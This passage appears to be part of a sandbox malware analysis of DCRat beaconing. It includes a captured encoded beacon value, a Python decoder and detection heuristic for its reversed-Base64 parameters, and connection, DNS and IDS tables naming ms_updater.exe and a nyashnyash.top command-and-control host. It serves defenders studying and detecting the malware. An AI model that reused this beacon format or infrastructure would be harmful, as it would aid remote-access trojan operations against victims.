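    "&c99321a829dc5e86d2744a321e9e8225=d1nIiBDNxEDOwIDN5QmZiRjNkZDZ5QmM4QDOjVDZ0E2NkdzMyQWY5YGOxIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W"
)


def decode_reversed_b64(value: str) -> Optional[bytes]:
    """Reverse the string, restore padding and Base64-decode it.
    Returns None when the reversed string is not valid Base64."""
    rev = value[::-1]
    rev += "=" * (-len(rev) % 4)
    try:
        return base64.b64decode(rev, validate=True)
    except (binascii.Error, ValueError):
        return None


def _is_hex(text: str) -> bool:
    return len(text) >= 16 and set(text.lower()) <= HEX


def classify(value: str, raw: Optional[bytes]) -> Tuple[str, object]:
    """Label one query value.
    ('hex-id', str)  reversed Base64 of a hex identifier
    ('json', obj)    reversed Base64 of a JSON document
    ('text', str)    reversed Base64 of other printable ASCII
    ('raw-hex', str) sent as plain hex, e.g. an MD5
    ('opaque', None) anything else (the short random-looking parameters)"""
    if raw is not None:
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            text = None
        if text and text.isprintable():
            if _is_hex(text):
                return ("hex-id", text)
            try:
                return ("json", json.loads(text))
            except ValueError:
                return ("text", text)
    if _is_hex(value):
        return ("raw-hex", value)
    return ("opaque", None)


def parse_beacon(url: str) -> dict:
    """Map every query parameter of a beacon URL to its (label, payload)."""
    return {
        name: classify(value, decode_reversed_b64(value))
        for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True)
    }


def looks_like_dcrat_beacon(url: str, min_hits: int = 1) -> bool:
    """Detection heuristic for proxy logs: a .php endpoint carrying 32-hex
    parameter names whose values are reversed Base64 of printable text."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".php"):
        return False
    hits = 0
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(name) == 32 and set(name.lower()) <= HEX:
            label, _ = classify(value, decode_reversed_b64(value))
            hits += label in ("hex-id", "json", "text")
    return hits >= min_hits


if __name__ == "__main__":
    for url in (FIRST_BEACON, SECOND_BEACON):
        print(url.split("?")[0], "->", looks_like_dcrat_beacon(url))
        for name, (label, payload) in parse_beacon(url).items():
            print(f"  {name[:12]:<12} {label:<8} {payload if label != 'opaque' else ''}")
```

The decoded identifiers (for example e27e814e856938c11cb45c7d62c4d719d27fc890 behind e95b42d7b0485703d17241e76e2b8585 in the first request) are what to pivot on across proxy logs, rather than the opaque encoded strings, and looks_like_dcrat_beacon() matches the pattern without depending on the nyashnyash.top domain, which will rotate.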

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
unknown
1080
svchost.exe
224.0.0.252:5355
unknown
2672
ms_updater.exe
172.67.34.170:443
pastebin.com
CLOUDFLARENET
US
unknown
2672
ms_updater.exe
188.114.97.3:80
355212cm.nyashnyash.top
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
pastebin.com
  • 172.67.34.170
  • 104.20.67.143
  • 104.20.68.143
shared
355212cm.nyashnyash.top
  • 188.114.97.3
  • 188.114.96.3
unknown

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2672
ms_updater.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2672
ms_updater.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
1 ETPRO signature is available in the full report
No debug info